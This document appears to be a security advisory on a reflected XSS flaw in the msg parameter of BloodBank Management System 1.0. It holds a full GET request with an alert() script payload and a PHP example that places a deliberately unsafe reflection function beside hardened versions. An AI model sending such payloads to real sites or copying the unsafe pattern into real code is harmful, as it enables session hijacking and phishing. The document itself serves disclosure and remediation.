- BloodBank Management System: 1.0
- Vulnerability Type: Cross-Site Scripting (XSS)
- Severity: HIGH
- Status: Unpatched
- Path: /bloodrequest.php?msg=
A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the blood request functionality of the BloodBank Management System. This flaw occurs because the msg parameter is not properly sanitized before being rendered on the web page. This allows an attacker to inject malicious JavaScript code, which will be executed when the page is accessed.
Successful exploitation can lead to session hijacking, redirection to phishing sites, or unauthorized actions on behalf of the victim. Additionally, this could be exploited for social engineering attacks or to spread malware.
Below is an example of a GET request that injects JavaScript code via the msg parameter:
GET /bloodrequest.php?msg=%3cscript%3ealert(%22xss%22)%3c%2fscript%3e%20have%20logged%20in. HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
When this request is executed, the following script will be injected into the page:
<script>alert("xss")</script>
This will trigger a JavaScript alert as a demonstration of the vulnerability.
- Session Hijacking: An attacker could steal session cookies and impersonate users.
- Phishing Attacks: Victims could be redirected to malicious sites to steal credentials.
- Malware Spread: Malicious scripts could be executed on the client’s browser.
- Data Manipulation: Attackers could modify the content displayed to users.
- Reputational Damage: Users may lose trust in the system due to malicious behavior.
- Input Validation and Sanitization: Sanitize all user input by escaping special characters like <, >, and ".
- Use HTTP Headers: Implement a Content Security Policy (CSP) to prevent script execution from unauthorized sources.
- Encoding Output: Properly encode dynamic content before rendering it on web pages to prevent script injection.
- Use Prepared Statements: Avoid dynamically building HTML with user-provided data.
- Security Testing: Perform regular penetration testing to identify and fix XSS vulnerabilities early.
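The following PHP is an added example and is not code from the BloodBank Management System project. It shows the unsafe reflection pattern the advisory describes next to a hardened version that applies the output-encoding and CSP recommendations above. Only the parameter name msg comes from the advisory; the function names, surrounding markup, message table and CSP policy string are assumptions chosen for illustration.

```php
<?php
// Added example, not code from the BloodBank Management System project.
// Only the parameter name "msg" comes from the advisory; the function
// names, the surrounding markup, the message table and the CSP policy
// are assumptions chosen to illustrate the fix.

// Vulnerable pattern: the raw query parameter is concatenated into HTML,
// so a value such as <script>alert("xss")</script> is parsed as markup.
function render_message_unsafe(string $msg): string
{
    return '<div class="alert">' . $msg . '</div>';
}

// Hardened pattern: encode the value for the HTML text context before it
// is written out. ENT_QUOTES also encodes single and double quotes, which
// matters if the same value is ever placed inside an attribute.
function render_message_safe(string $msg): string
{
    $encoded = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="alert">' . $encoded . '</div>';
}

// Defence in depth: instead of reflecting free text, let the URL carry a
// short key and look the message up server-side. Unknown keys render nothing.
const KNOWN_MESSAGES = [
    'request_sent' => 'Your blood request has been submitted.',
    'logged_in'    => 'You have logged in.',
];

function message_for_key(?string $key): string
{
    return KNOWN_MESSAGES[$key] ?? '';
}

// Content Security Policy: with no 'unsafe-inline' in script-src, an inline
// <script> block is refused by the browser even if encoding is missed somewhere.
function send_csp_header(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

// Demonstration with the advisory's payload in its URL-decoded form.
$payload = '<script>alert("xss")</script> have logged in.';

echo "unsafe: " . render_message_unsafe($payload) . "\n";
echo "safe:   " . render_message_safe($payload) . "\n";
echo "keyed:  " . message_for_key('logged_in') . "\n";
echo "keyed:  '" . message_for_key($payload) . "'\n";
```

Run it from the command line with php to compare the two renderings: the unsafe function passes the script tag through unchanged, while the hardened one emits it as entity-encoded text that the browser displays rather than executes. Encoding belongs at output time and must match the context the value lands in (HTML body, attribute, JavaScript, URL); the CSP header is a backstop for the cases where that step is missed, not a replacement for it.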